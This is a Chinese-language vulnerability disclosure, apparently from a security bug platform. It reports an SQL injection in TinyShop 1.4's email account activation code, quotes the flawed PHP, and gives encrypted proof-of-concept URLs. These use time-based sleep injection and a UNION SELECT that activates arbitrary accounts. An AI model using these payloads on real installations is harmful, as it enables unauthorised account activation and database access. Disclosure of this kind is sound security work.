TinyShop SQL注入

### 简要描述： 1.4 ### 详细说明： 1.4更新内容中 4、增加是否开启邮箱注册验证功能（防止垃圾用户注册），同时加入token防止一些自动注册软件的注册。 看了一下 /protected/controllers/simple.php中 ``` //账户激活邮件认证 public function activation_user() { $code =Filter::text(Req::args('code')); //获取code参数 $email_code = substr($code,32); $valid_code = substr($code,0,32); $email = Crypt::decode($email_code); //利用decode函数进行解密 $model = new Model('user'); $user = $model->where("email='".$email."'")->find(); if($user && $user['status']==0 && md5($user['validcode'])==$valid_code){ $model->data(array('status'=>1))->where('id='.$user['id'])->update(); $this->redirect("/index/msg",false,array('type'=>"success","msg"=>'账户激活成功',"content"=>"账户通过邮件成功激活。","redirect"=>"/simple/login")); }else{ $this->redirect("/index/msg",false,array('type'=>"fail","msg"=>'账户激活失败',"content"=>"你的连接地址无效，无法进行账户激活，请核实你的连接地址无误。")); } } ``` ### 漏洞证明： 这里的加解密方法都提供了所以直接对我们的payload用对应加密函数进行加密，就行 payload test123@qq.com' or sleep(5) # 无论有没有email为test123@qq.com的用户，都会延时5秒 echo Crypt::encode("test123@qq.com' and sleep(5) #") 得到 cdd5ae92abMjA0OTk1MDc5NWczOGVjMTNhODZkNjk4OzNnNGI3ZTdzZXN0NzszRXJ3LmVtbiQjaW1sIHdoZWVwKDwpJSM 前面加上任意32位作为校验码，这里我用md5(a)=0cc175b9c0f1b6a831c399e269772661 最后code为0cc175b9c0f1b6a831c399e269772661cdd5ae92abMjA0OTk1MDc5NWczOGVjMTNhODZkNjk4OzNnNGI3ZTdzZXN0NzszRXJ3LmVtbiQjaW1sIHdoZWVwKDwpJSM 没有回显，用延时注入证明： http://localhost/tinyshop/index.php?con=simple&act=activation_user&code=0cc175b9c0f1b6a831c399e269772661cdd5ae92abMjA0OTk1MDc5NWczOGVjMTNhODZkNjk4OzNnNGI3ZTdzZXN0NzszRXJ3LmVtbiQjaW1sIHdoZWVwKDwpJSM [<img src="https://images.seebug.org/upload/201504/09143352ae74bca4f342fde1b034f539f541b100.png" alt="屏幕快照 2015-04-09 下午2.28.08.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/09143352ae74bca4f342fde1b034f539f541b100.png) [<img src="https://images.seebug.org/upload/201504/09143358cfcc4efd3fea529a6017098c659ad25b.png" alt="屏幕快照 2015-04-09 下午2.33.35.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/09143358cfcc4efd3fea529a6017098c659ad25b.png) 构造poc，完全绕过邮箱验证，验证任意邮箱，先后台开启邮箱激活验证 加密前：test123@qq.com' union select 4,2,3,4,5,'a',0 # 4为要激活的账号 a为MD5前的验证码，与code前32位匹配，0对应status http://localhost/tinyshop/index.php?con=simple&act=activation_user&code=0cc175b9c0f1b6a831c399e269772661ff14e1a529NTMwMDA3OTAyNmRhOWE1YTViazVjMzpkOjFlZGIyNGx9ZXR0MXlvdX5pMUMxNzIqZGdtJyByZmlvbSB7Z2thYHIgNiw7KTMpNC81LSdoLy8wJSY 证明： [<img src="https://images.seebug.org/upload/201504/091421323347d1f5338b8d1317041e050df668a4.png" alt="屏幕快照 2015-04-09 下午2.12.10.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/091421323347d1f5338b8d1317041e050df668a4.png) [<img src="https://images.seebug.org/upload/201504/0914213947bc86b09df630436b6a15f01f511b76.png" alt="屏幕快照 2015-04-09 下午2.18.40.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/0914213947bc86b09df630436b6a15f01f511b76.png) [<img src="https://images.seebug.org/upload/201504/0914214515d983ff038ffc626e7f7b75db610957.png" alt="屏幕快照 2015-04-09 下午2.19.05.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/0914214515d983ff038ffc626e7f7b75db610957.png)